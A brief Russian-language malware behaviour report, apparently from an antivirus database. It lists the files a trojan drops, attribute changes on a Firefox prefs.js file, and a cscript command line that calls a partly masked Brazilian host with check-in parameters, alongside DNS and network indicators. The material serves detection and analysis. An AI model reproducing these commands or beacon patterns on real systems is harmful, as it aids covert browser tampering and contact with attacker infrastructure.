Техническая информация
- Компонент восстановления системы (SR)
- '%TEMP%\Install.exe'
- '<SYSTEM32>\attrib.exe' +r "%APPDATA%\Mozilla\Firefox\Profiles\cwdgt0y8.default\prefs.js"
- '<SYSTEM32>\cscript.exe' //nologo "%TEMP%\send16760.vbs" "http://no##.##oravuaii.com.br/roxeda/?" "tipo=alivei&cliente=aquelela"
- '<SYSTEM32>\cmd.exe' /c %TEMP%\lZ4.bat
- '<SYSTEM32>\attrib.exe' -r -a -s -h "%APPDATA%\Mozilla\Firefox\Profiles\cwdgt0y8.default\prefs.js"
- %TEMP%\CRNJEUFU.txt
- %TEMP%\send16760.vbs
- %TEMP%\Install.exe
- %TEMP%\lZ4.bat
- %TEMP%\lZ4.bat
- 'no##.##oravuaii.com.br':80
- 'localhost':1035
- DNS ASK no##.##oravuaii.com.br
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'